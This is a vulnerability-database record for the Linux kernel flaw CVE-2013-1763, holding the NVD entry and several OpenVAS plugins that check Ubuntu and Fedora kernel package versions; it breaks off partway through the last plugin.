{"cve": [{"lastseen": "2020-12-09T19:52:39", "description": "Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.", "edition": 5, "cvss3": {}, "published": "2013-02-28T19:55:00", "title": "CVE-2013-1763", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1763"], "modified": "2014-05-16T04:15:00", "id": "CVE-2013-1763", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1763", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], 
"openvas": [{"lastseen": "2018-01-26T11:10:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "description": "Check for the Version of linux-lts-quantal", "modified": "2018-01-25T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:841341", "href": "http://plugins.openvas.org/nasl.php?oid=841341", "type": "openvas", "title": "Ubuntu Update for linux-lts-quantal USN-1749-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1749_1.nasl 8526 2018-01-25 06:57:37Z teissa $\n#\n# Ubuntu Update for linux-lts-quantal USN-1749-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"linux-lts-quantal on Ubuntu 12.04 LTS\";\ntag_insight = \"Brad Spengler discovered a bounds checking error for netlink messages\n requesting SOCK_DIAG_BY_FAMILY. 
An unprivileged local user could exploit\n this flaw to crash the system or run programs as an administrator.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1749-1/\");\n script_id(841341);\n script_version(\"$Revision: 8526 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 07:57:37 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:08:12 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1749-1\");\n script_name(\"Ubuntu Update for linux-lts-quantal USN-1749-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of linux-lts-quantal\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-generic\", ver:\"3.5.0-25.39~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": 
"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:09:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "description": "Check for the Version of linux", "modified": "2018-01-19T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:841343", "href": "http://plugins.openvas.org/nasl.php?oid=841343", "type": "openvas", "title": "Ubuntu Update for linux USN-1750-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1750_1.nasl 8466 2018-01-19 06:58:30Z teissa $\n#\n# Ubuntu Update for linux USN-1750-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"linux on Ubuntu 12.10\";\ntag_insight = \"Brad Spengler discovered a bounds checking error for netlink messages\n requesting SOCK_DIAG_BY_FAMILY. 
An unprivileged local user could exploit\n this flaw to crash the system or run programs as an administrator.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1750-1/\");\n script_id(841343);\n script_version(\"$Revision: 8466 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 07:58:30 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:08:18 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1750-1\");\n script_name(\"Ubuntu Update for linux USN-1750-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of linux\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-generic\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-highbank\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"linux-image-3.5.0-25-omap\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-powerpc-smp\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-powerpc64-smp\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:1361412562310841341", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841341", "type": "openvas", "title": "Ubuntu Update for linux-lts-quantal USN-1749-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1749_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-lts-quantal USN-1749-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1749-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841341\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:08:12 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1749-1\");\n script_name(\"Ubuntu Update for linux-lts-quantal USN-1749-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-quantal'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n script_tag(name:\"affected\", value:\"linux-lts-quantal on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"Brad Spengler discovered a bounds checking error for netlink messages\n requesting SOCK_DIAG_BY_FAMILY. 
An unprivileged local user could exploit\n this flaw to crash the system or run programs as an administrator.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-generic\", ver:\"3.5.0-25.39~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:1361412562310841339", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841339", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-1751-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1751_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1751-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1751-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841339\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:07:55 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1751-1\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1751-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.10\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.10\");\n script_tag(name:\"insight\", value:\"Mathias Krause discovered a bounds checking error for netlink messages\n requesting SOCK_DIAG_BY_FAMILY. 
An unprivileged local user could exploit\n this flaw to crash the system or run programs as an administrator.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-220-omap4\", ver:\"3.5.0-220.29\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:1361412562310841343", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841343", "type": "openvas", "title": "Ubuntu Update for linux USN-1750-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1750_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux USN-1750-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1750-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841343\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:08:18 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1750-1\");\n script_name(\"Ubuntu Update for linux USN-1750-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.10\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.10\");\n script_tag(name:\"insight\", value:\"Brad Spengler discovered a bounds checking error for netlink messages\n requesting SOCK_DIAG_BY_FAMILY. 
An unprivileged local user could exploit\n this flaw to crash the system or run programs as an administrator.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-generic\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-highbank\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-omap\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-powerpc-smp\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-25-powerpc64-smp\", ver:\"3.5.0-25.39\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-22T13:09:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "description": "Check for the Version of linux-ti-omap4", "modified": "2018-01-22T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:841339", "href": "http://plugins.openvas.org/nasl.php?oid=841339", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-1751-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1751_1.nasl 8483 
2018-01-22 06:58:04Z teissa $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1751-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"linux-ti-omap4 on Ubuntu 12.10\";\ntag_insight = \"Mathias Krause discovered a bounds checking error for netlink messages\n requesting SOCK_DIAG_BY_FAMILY. 
An unprivileged local user could exploit\n this flaw to crash the system or run programs as an administrator.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1751-1/\");\n script_id(841339);\n script_version(\"$Revision: 8483 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 07:58:04 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:07:55 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1751-1\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1751-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of linux-ti-omap4\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-220-omap4\", ver:\"3.5.0-220.29\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, 
{"lastseen": "2018-01-19T15:09:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0190", "CVE-2013-1763", "CVE-2013-0290"], "description": "Check for the Version of kernel", "modified": "2018-01-19T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:865399", "href": "http://plugins.openvas.org/nasl.php?oid=865399", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2013-3086", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2013-3086\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"kernel on Fedora 18\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. 
The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/099325.html\");\n script_id(865399);\n script_version(\"$Revision: 8466 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 07:58:30 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:08:10 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\", \"CVE-2013-0290\", \"CVE-2013-0228\", \"CVE-2013-0190\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-3086\");\n script_name(\"Fedora Update for kernel FEDORA-2013-3086\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.7.9~205.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": 
{"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0190", "CVE-2013-1763", "CVE-2013-0290"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:1361412562310865399", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865399", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2013-3086", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2013-3086\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/099325.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865399\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:08:10 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\", \"CVE-2013-0290\", \"CVE-2013-0228\", \"CVE-2013-0190\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2013-3086\");\n 